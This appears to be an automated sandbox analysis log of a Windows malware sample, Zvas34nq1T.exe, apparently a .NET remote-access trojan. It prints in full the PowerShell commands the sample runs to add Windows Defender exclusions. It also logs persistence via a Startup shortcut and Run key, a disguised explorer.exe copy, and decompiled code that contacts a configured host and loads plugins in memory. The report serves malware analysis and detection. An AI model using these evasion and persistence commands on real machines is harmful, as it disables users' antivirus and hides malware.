Source: C:\Users\user\Desktop\Zvas34nq1T.exe, Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\explorer.exe'
Source: C:\Users\user\Desktop\Zvas34nq1T.exe, Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'explorer.exe'
            Source: C:\Users\user\Desktop\Zvas34nq1T.exe | Section loaded: mscoree.dll
            Source: C:\Users\user\Desktop\Zvas34nq1T.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\Zvas34nq1T.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\Zvas34nq1T.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\Zvas34nq1T.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\Desktop\Zvas34nq1T.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\Desktop\Zvas34nq1T.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\Desktop\Zvas34nq1T.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\Zvas34nq1T.exe | Section loaded: sspicli.dll
            Source: C:\Users\user\Desktop\Zvas34nq1T.exe | Section loaded: cryptsp.dll
            Source: C:\Users\user\Desktop\Zvas34nq1T.exe | Section loaded: rsaenh.dll
            Source: C:\Users\user\Desktop\Zvas34nq1T.exe | Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\Zvas34nq1T.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\Zvas34nq1T.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\Zvas34nq1T.exe | Section loaded: propsys.dll
            Source: C:\Users\user\Desktop\Zvas34nq1T.exe | Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\Zvas34nq1T.exe | Section loaded: edputil.dll
            Source: C:\Users\user\Desktop\Zvas34nq1T.exe | Section loaded: urlmon.dll
            Source: C:\Users\user\Desktop\Zvas34nq1T.exe | Section loaded: iertutil.dll
            Source: C:\Users\user\Desktop\Zvas34nq1T.exe | Section loaded: srvcli.dll
            Source: C:\Users\user\Desktop\Zvas34nq1T.exe | Section loaded: netutils.dll
            Source: C:\Users\user\Desktop\Zvas34nq1T.exe | Section loaded: windows.staterepositoryps.dll
            Source: C:\Users\user\Desktop\Zvas34nq1T.exe | Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\Zvas34nq1T.exe | Section loaded: appresolver.dll
            Source: C:\Users\user\Desktop\Zvas34nq1T.exe | Section loaded: bcp47langs.dll
            Source: C:\Users\user\Desktop\Zvas34nq1T.exe | Section loaded: slc.dll
            Source: C:\Users\user\Desktop\Zvas34nq1T.exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\Zvas34nq1T.exe | Section loaded: sppc.dll
            Source: C:\Users\user\Desktop\Zvas34nq1T.exe | Section loaded: onecorecommonproxystub.dll
            Source: C:\Users\user\Desktop\Zvas34nq1T.exe | Section loaded: onecoreuapcommonproxystub.dll
            Source: C:\Users\user\Desktop\Zvas34nq1T.exe | Section loaded: sxs.dll
            Source: C:\Users\user\Desktop\Zvas34nq1T.exe | Section loaded: mpr.dll
            Source: C:\Users\user\Desktop\Zvas34nq1T.exe | Section loaded: scrrun.dll
            Source: C:\Users\user\Desktop\Zvas34nq1T.exe | Section loaded: linkinfo.dll
            Source: C:\Users\user\Desktop\Zvas34nq1T.exe | Section loaded: ntshrui.dll
            Source: C:\Users\user\Desktop\Zvas34nq1T.exe | Section loaded: cscapi.dll
            Source: C:\Users\user\Desktop\Zvas34nq1T.exe | Section loaded: mswsock.dll
            Source: C:\Users\user\Desktop\Zvas34nq1T.exe | Section loaded: dnsapi.dll
            Source: C:\Users\user\Desktop\Zvas34nq1T.exe | Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\Zvas34nq1T.exe | Section loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\Zvas34nq1T.exe | Section loaded: fwpuclnt.dll
            Source: C:\Users\user\Desktop\Zvas34nq1T.exe | Section loaded: wbemcomn.dll
            Source: C:\Users\user\Desktop\Zvas34nq1T.exe | Section loaded: amsi.dll
            Source: C:\Users\user\Desktop\Zvas34nq1T.exe | Section loaded: avicap32.dll
            Source: C:\Users\user\Desktop\Zvas34nq1T.exe | Section loaded: msvfw32.dll
            Source: C:\Users\user\Desktop\Zvas34nq1T.exe | Section loaded: winmm.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
            Source: C:\Users\user\AppData\Roaming\explorer.exe | Section loaded: mscoree.dll
            Source: C:\Users\user\AppData\Roaming\explorer.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\AppData\Roaming\explorer.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Roaming\explorer.exe | Section loaded: version.dll
            Source: C:\Users\user\AppData\Roaming\explorer.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\explorer.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\explorer.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\explorer.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Roaming\explorer.exe | Section loaded: sspicli.dll
            Source: C:\Users\user\AppData\Roaming\explorer.exe | Section loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Roaming\explorer.exe | Section loaded: rsaenh.dll
            Source: C:\Users\user\AppData\Roaming\explorer.exe | Section loaded: cryptbase.dll
            Source: C:\Users\user\AppData\Roaming\explorer.exe | Section loaded: mscoree.dll
            Source: C:\Users\user\AppData\Roaming\explorer.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Roaming\explorer.exe | Section loaded: version.dll
            Source: C:\Users\user\AppData\Roaming\explorer.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\explorer.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\explorer.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\explorer.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Roaming\explorer.exe | Section loaded: sspicli.dll
            Source: C:\Users\user\AppData\Roaming\explorer.exe | Section loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Roaming\explorer.exe | Section loaded: rsaenh.dll
            Source: C:\Users\user\AppData\Roaming\explorer.exe | Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\Zvas34nq1T.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32
            Source: explorer.lnk.0.dr | LNK file: ..\..\..\..\..\explorer.exe
            Source: Window Recorder | Window detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
            Source: Zvas34nq1T.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: Zvas34nq1T.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            Source: Zvas34nq1T.exe, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: Zvas34nq1T.exe, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: Zvas34nq1T.exe, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
            Source: explorer.exe.0.dr, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: explorer.exe.0.dr, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: explorer.exe.0.dr, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
            Source: Zvas34nq1T.exe, Messages.cs | .Net Code: Plugin System.AppDomain.Load(byte[])
            Source: Zvas34nq1T.exe, Messages.cs | .Net Code: Memory System.AppDomain.Load(byte[])
            Source: Zvas34nq1T.exe, Messages.cs | .Net Code: Memory
            Source: explorer.exe.0.dr, Messages.cs | .Net Code: Plugin System.AppDomain.Load(byte[])
            Source: explorer.exe.0.dr, Messages.cs | .Net Code: Memory System.AppDomain.Load(byte[])
            Source: explorer.exe.0.dr, Messages.cs | .Net Code: Memory
            Source: C:\Users\user\Desktop\Zvas34nq1T.exe | Code function: 0_2_00007FFD9B898294 push ebp; retf 0_2_00007FFD9B8982A8
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FFD9B76D2A5 pushad ; iretd 1_2_00007FFD9B76D2A6
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FFD9B958DB0 push eax; ret 1_2_00007FFD9B958DB1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FFD9B952316 push 8B485F94h; iretd 1_2_00007FFD9B95231B
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FFD9B78D2A5 pushad ; iretd 4_2_00007FFD9B78D2A6
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FFD9B972E11 push esi; ret 4_2_00007FFD9B9730CA
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FFD9B972E11 push 6078C356h; ret 4_2_00007FFD9B97332A
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FFD9B972E11 push edi; ret 4_2_00007FFD9B973582
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FFD9B973580 push edi; ret 4_2_00007FFD9B973582
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FFD9B9725A8 push ebx; ret 4_2_00007FFD9B9725C2
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FFD9B972316 push 8B485F92h; iretd 4_2_00007FFD9B97231B
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_00007FFD9B76D2A5 pushad ; iretd 9_2_00007FFD9B76D2A6
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_00007FFD9B952316 push 8B485F94h; iretd 9_2_00007FFD9B95231B
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 11_2_00007FFD9B78D2A5 pushad ; iretd 11_2_00007FFD9B78D2A6
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 11_2_00007FFD9B8A1183 push E95C9F05h; ret 11_2_00007FFD9B8A1239
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 11_2_00007FFD9B972316 push 8B485F92h; iretd 11_2_00007FFD9B97231B
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 11_2_00007FFD9B977CED push eax; iretd 11_2_00007FFD9B977D79

            Persistence and Installation Behavior

            Source: C:\Users\user\Desktop\Zvas34nq1T.exe | File created: C:\Users\user\AppData\Roaming\explorer.exe
            Source: C:\Users\user\Desktop\Zvas34nq1T.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.lnk
            Source: C:\Users\user\Desktop\Zvas34nq1T.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run explorer

            Hooking and other Techniques for Hiding and Protection

            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exe    Process information set: NOOPENFILEERRORBOX    (41 identical events; this is the SetErrorMode flag SEM_NOOPENFILEERRORBOX, which suppresses the message box Windows would otherwise show when a file cannot be found)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
